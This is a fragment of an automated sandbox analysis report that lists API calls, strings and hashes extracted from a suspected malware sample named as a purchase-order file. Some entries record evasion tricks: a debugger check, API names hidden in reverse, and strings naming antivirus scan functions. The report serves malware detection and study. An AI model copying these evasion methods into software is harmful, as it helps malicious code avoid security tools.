                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                                        • Opcode ID: da0e17cd9ba312b33d09c5d826ad270a7eef381f6964e1767c96245445169a18
                                                                                                                                        • Instruction ID: 9e9aade0a2a8dc555847e357a342d19404a7bcbaa2801255003286378a8b7951
                                                                                                                                        • Opcode Fuzzy Hash: da0e17cd9ba312b33d09c5d826ad270a7eef381f6964e1767c96245445169a18
                                                                                                                                        • Instruction Fuzzy Hash: 59F09662AC475075F720A6A4BC46F59275DC744B14F584A04B36A682C187B0BCCDDB3A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DDACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                          • Part of subcall function 02DDACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                          • Part of subcall function 02DDACBC: GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                          • Part of subcall function 02DDACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        • CharToOemA.USER32(?,?), ref: 02DDAE7B
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DDAE98
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAE9E
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,02DDAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAEB3
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,02DDAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAEB9
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DDAEDB
                                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DDAEF1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 185507032-0
                                                                                                                                        • Opcode ID: 36bca8bef6ec4fbdba92eec533cb542f60865aea81de3e42b2eec080295a9c52
                                                                                                                                        • Instruction ID: 955aa6a9f5c596fa249957b39f4ac8e898ec2aadaf134bf152e6378fc6c88cc1
                                                                                                                                        • Opcode Fuzzy Hash: 36bca8bef6ec4fbdba92eec533cb542f60865aea81de3e42b2eec080295a9c52
                                                                                                                                        • Instruction Fuzzy Hash: 7D1170B65886047AD200EBA4DC84F9F77EDEB44300F40495AB755D62D0DA70ED488FF6
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DDE5A5
                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DDE5C1
                                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DDE5FA
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DDE677
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DDE690
                                                                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02DDE6C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 351091851-0
                                                                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                        • Instruction ID: 4230a1e3d6f6229bed32cb3982ce5e6c3e4c99a20a39df6fe35dd904d2cf301e
                                                                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                        • Instruction Fuzzy Hash: 0B51ED76940A299BCB22DB68CC80BD9B3BDEF4D304F0445D5E609AB341DA30AF858F60
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD358A
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD35BD
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02DD35E0,00000000,?,00000004,00000000,02DD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD35D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                                                        • Opcode ID: fb2526fa1594f2f6fa983b35539bcbc93f8a3b442016c6495bb7f3c8a884a9cc
                                                                                                                                        • Instruction ID: c5719e73e599a7a1e6e478f5ae43519819f16b62bd67d46a0aca942124336689
                                                                                                                                        • Opcode Fuzzy Hash: fb2526fa1594f2f6fa983b35539bcbc93f8a3b442016c6495bb7f3c8a884a9cc
                                                                                                                                        • Instruction Fuzzy Hash: 5901F575A40648BAE710DBD09C02BBD77ECD708701F2005A1BA04E6780E675DE10CF69
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: Kernel32$sserddAcorPteG
                                                                                                                                        • API String ID: 667068680-1372893251
                                                                                                                                        • Opcode ID: 1509e3dce2a7cdc65b67c770ff813fc4f47fb22f27b63ebf5d16495811cb65a1
                                                                                                                                        • Instruction ID: 11256c3d6457e9cffeff4cace63bec92106e4ec726d2e13fc57ba84c4d98d7e4
                                                                                                                                        • Opcode Fuzzy Hash: 1509e3dce2a7cdc65b67c770ff813fc4f47fb22f27b63ebf5d16495811cb65a1
                                                                                                                                        • Instruction Fuzzy Hash: 95016238A80708AFEB01FFA5EC45E9E77AEEB49710F924468F405D7710DA70AD009A74
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02DDAA67,?,?,00000000), ref: 02DDA9E8
                                                                                                                                          • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02DDAA67,?,?,00000000), ref: 02DDAA18
                                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02DDAA23
                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02DDAA67,?,?,00000000), ref: 02DDAA41
                                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02DDAA4C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4102113445-0
                                                                                                                                        • Opcode ID: 28620eb6c11330bf6ed9ece8ef926840c24c307d13d603a6096a008084197723
                                                                                                                                        • Instruction ID: 1525f4d93ddf092c19e3bdd10f747269e365ba0347e4dd75efc2e3f8d6ef7d00
                                                                                                                                        • Opcode Fuzzy Hash: 28620eb6c11330bf6ed9ece8ef926840c24c307d13d603a6096a008084197723
                                                                                                                                        • Instruction Fuzzy Hash: 7C01F234244E846BF701A678ED12B6E735DDB46720FD192A0F500A6BC0E664EE008AF4
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02DDAC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DDAAAF
                                                                                                                                          • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                                        • Opcode ID: d61eae29b3a91cbf0216159668a74a3234988c1dc5f3964d4d802aba6037ced8
                                                                                                                                        • Instruction ID: 618ab050018f2737e07ea48deee6f68f20cae5eba9ffea4b6d3deb0f2d368d4c
                                                                                                                                        • Opcode Fuzzy Hash: d61eae29b3a91cbf0216159668a74a3234988c1dc5f3964d4d802aba6037ced8
                                                                                                                                        • Instruction Fuzzy Hash: 8E41E538708E495BD711EB7C88807BEB3EBDB85214F54C925E4A2D7344EA78ED06CA71
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
                                                                                                                                          • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
                                                                                                                                          • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
                                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                                        • Opcode ID: e70d8d0971d31a3371130c52ca317d611a2403c1ab5d515e004fd14d6274749c
                                                                                                                                        • Instruction ID: 093fb90bfd7018cfb1f3e9a15ea78aca126e4ab2591602e2fea6822a1c3b0e81
                                                                                                                                        • Opcode Fuzzy Hash: e70d8d0971d31a3371130c52ca317d611a2403c1ab5d515e004fd14d6274749c
                                                                                                                                        • Instruction Fuzzy Hash: 82F0CD34680708AFEB00FBA0EC4295A77ADEB09B40BA20960F401D7B10D730AE409A60
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02DEEF90,UacInitialize,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString), ref: 02DEEB92
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DEEBA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                                        • Opcode ID: fd4e67f709381d81afc277589ad1826bc8631dcfebc99d3470d1c2692fa05e2a
                                                                                                                                        • Instruction ID: 4cb7fabfc7d0d406e8865a9bbf690240f32201b5ee7c8d2bf5c8969c47ac9063
                                                                                                                                        • Opcode Fuzzy Hash: fd4e67f709381d81afc277589ad1826bc8631dcfebc99d3470d1c2692fa05e2a
                                                                                                                                        • Instruction Fuzzy Hash: 7CD01265355B501DFD0075F42CC4C1F03CDC50553D7240EA0F023D53D1E566CC1555A1
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02DFC10B,00000000,02DFC11E), ref: 02DDC3FA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DDC40B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                                        • Opcode ID: 51492abd61497bed38e5f22b4d06c31cc6b9e718cc09a34bc38bdeea0171892d
                                                                                                                                        • Instruction ID: 30edc41cb4eaae3313a2b7a15c5354b433482dfb547465d61327d42c85074d35
                                                                                                                                        • Opcode Fuzzy Hash: 51492abd61497bed38e5f22b4d06c31cc6b9e718cc09a34bc38bdeea0171892d
                                                                                                                                        • Instruction Fuzzy Hash: 76D05E60A90B404AFB406FB1F881B3E2789C308706F005866E50155301D761BC18CFA8
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DDE217
                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DDE233
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DDE2AA
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 02DDE2D3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 920484758-0
                                                                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                        • Instruction ID: 2201f2dad33885c5acaccf4a46a6f55aa7258faf2001d9bfcf618f5a0d00381f
                                                                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                        • Instruction Fuzzy Hash: 2B41EC76A01A299FCB61DB58CC90BD9B7BDEF49314F0041D5E649AB351DA30AF84CF60
                                                                                                                                        APIs
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                        • GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3990497365-0
                                                                                                                                        • Opcode ID: c51654078bb91ab2b86d5e75dc36c4a44776b50aa88997b9ca3390c153871f84
                                                                                                                                        • Instruction ID: 92497a2f8ce08ef025fd067505cf80cc04ee3578e59dcb5a815569d47ebae278
                                                                                                                                        • Opcode Fuzzy Hash: c51654078bb91ab2b86d5e75dc36c4a44776b50aa88997b9ca3390c153871f84
                                                                                                                                        • Instruction Fuzzy Hash: 42410874A406589BDB61EB68DC84BDAB7FDAB08301F4440EAA548E7341DB749F84CF60
                                                                                                                                        APIs
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                        • GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 71aed838403eb56ec35dc60e1e75c5956a45fc85ada51514543b1ceeeb523b9a
• Instruction ID: 1de8cafe341cb88f7058ebed6b6c6a075f54f9465ebf8adfcc0b4afb20cf9513
• Opcode Fuzzy Hash: 71aed838403eb56ec35dc60e1e75c5956a45fc85ada51514543b1ceeeb523b9a
• Instruction Fuzzy Hash: FF411B74A406589BDB61EB68DC84BDAB7EDAB08301F4440E5A548E7341DB74DF84CF60
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e521871343254065e45c700f33ba3cc7b3fe5a96b7033b4af9025dd56d61c81d
• Instruction ID: 86d2b262da8fd69072b3039c9bdb74062cf9764f45fcc0a0396d7bffa377bb15
• Opcode Fuzzy Hash: e521871343254065e45c700f33ba3cc7b3fe5a96b7033b4af9025dd56d61c81d
• Instruction Fuzzy Hash: A2A1E567750A100BE728AA7D9D803ADB3D6DBC4225F1C427EE11DCB3C5EB68DD46C650
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DD955A), ref: 02DD94F2
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DD955A), ref: 02DD94F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
